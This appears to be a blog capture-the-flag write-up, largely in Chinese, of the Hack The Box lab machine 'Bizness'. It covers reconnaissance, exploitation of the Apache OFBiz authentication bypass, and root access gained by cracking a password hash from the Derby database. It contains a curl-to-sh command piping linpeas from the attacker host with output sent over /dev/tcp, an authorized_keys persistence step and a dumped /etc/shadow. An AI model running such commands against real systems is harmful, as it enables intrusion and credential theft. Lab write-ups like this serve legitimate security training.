Zumpyx Blog

Bizness

Machines#582EasyLinux

Recon & Enum

Export IP=10.10.11.252

  • nmap -sC -A -p- --min-rate 1000 -T4 $IP
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp    open  http       nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp   open  ssl/http   nginx 1.18.0
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_http-title: Did not follow redirect to https://bizness.htb/
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.18.0
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|_  http/1.1
45597/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 - 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Web 80/443 添加域名 bizness.htb,访问 Web 页面,在主页最下方发现 Apache OFBiz

Pasted+image+20240108081951.png

访问 Apache OFBiz 路径,得到版本号 18.12

Pasted+image+20240108082642.png

Shell as User - ofbiz

CVE-2023-49070 and CVE-2023-51467

https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass

发现最近出现的漏洞,尝试利用

Pasted+image+20240108082952.png

  • 首先确定 jdk 版本,Linux 需要 openjdk11 sudo apt install openjdk-11-jdk

Pasted+image+20240108083332.png

  • 管道符似乎会失效,可以命令分段执行,也可以通过 nc 反弹

Pasted+image+20240108084158.png

  • 添加公钥,ssh 访问
echo '[Public key]' >> ~/.ssh/authorized_keys

Shell as Root

  • 跑一下 Linpeas
curl http://10.10.16.2/linpeas.sh | sh > /dev/tcp/10.10.16.2/2233
  • 发现可写入服务

Pasted+image+20240108085127.png

但是对应的进程运行用户是 ofbiz,暂时忽略

  • 发现 Capabilities

Pasted+image+20240108085547.png

尝试利用 - 失败(可能是我太菜了)

Pasted+image+20240108085528.png

  • 尝试 sudo 权限,提示需要密码

Pasted+image+20240108085705.png

ofbiz 页面需要登陆,尝试寻找 ofbiz 连接的数据库以及密码,发现 derby 数据库

Pasted+image+20240108085901.png

  • 查找关键词 find / -name '*derby*' 2>/dev/null

Pasted+image+20240108090006.png

/opt/ofbiz/runtime/data/ 路径查找密码

grep -onr 'assw' |                           # 找到包含 assw 的文件
awk -F ':' '{print $1}' |                    # 提取文件名
sort -u |                                    # 去重
while read line; do strings $line; done |    # 打印所有文件的可打印字符
grep assw -C 1                               # 打印字符串中包含 assw 的上下文

最终发现一个疑似密码 Hash 的东西 $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

Pasted+image+20240108091123.png

  • 查看 ofbiz 源代码

https://github.com/apache/ofbiz/blob/trunk/framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java#L143

Pasted+image+20240108091405.png

发现 Hash 的格式为 $[Hash类型]$[盐]$[Hash的base64-Url]编码 因此首先将 base64 编码后的内容转化为 Hash 值,后再和盐一起尝试爆破

Pasted+image+20240108091725.png

  • 得到的 Hash
b8fd3f41a541a435857a8f3e751cc3a91c174362:d
  • 结合实际情况,使用 hashcat 110 和 120 模式尝试爆破

Pasted+image+20240108091917.png

得到密码

Pasted+image+20240108091957.png

  • 尝试执行 sudo - 密码错误,尝试登录 root 成功

Pasted+image+20240108092133.png

Dump Hash

  • cat /etc/shadow
root:$y$j9T$pJW9XfkWvA4ozHorBy1kA1$MMNByIaVvdq4YrIpvYDEIfckbiKog11HxKcxJkAZLcA:19709:0:99999:7:::
daemon:*:19668:0:99999:7:::
bin:*:19668:0:99999:7:::
sys:*:19668:0:99999:7:::
sync:*:19668:0:99999:7:::
games:*:19668:0:99999:7:::
man:*:19668:0:99999:7:::
lp:*:19668:0:99999:7:::
mail:*:19668:0:99999:7:::
news:*:19668:0:99999:7:::
uucp:*:19668:0:99999:7:::
proxy:*:19668:0:99999:7:::
www-data:*:19668:0:99999:7:::
backup:*:19668:0:99999:7:::
list:*:19668:0:99999:7:::
irc:*:19668:0:99999:7:::
gnats:*:19668:0:99999:7:::
nobody:*:19668:0:99999:7:::
_apt:*:19668:0:99999:7:::
systemd-network:*:19668:0:99999:7:::
systemd-resolve:*:19668:0:99999:7:::
messagebus:*:19668:0:99999:7:::
systemd-timesync:*:19668:0:99999:7:::
sshd:*:19668:0:99999:7:::
systemd-coredump:!*:19668::::::
ofbiz:$y$j9T$0io/BiTgsGfXITtrQxine1$0PO2rHmI9H46z/uQszVpMm1V7UTYvB5lVh8.Vcx/Nt/:19709:0:99999:7:::
_laurel:!:19711::::::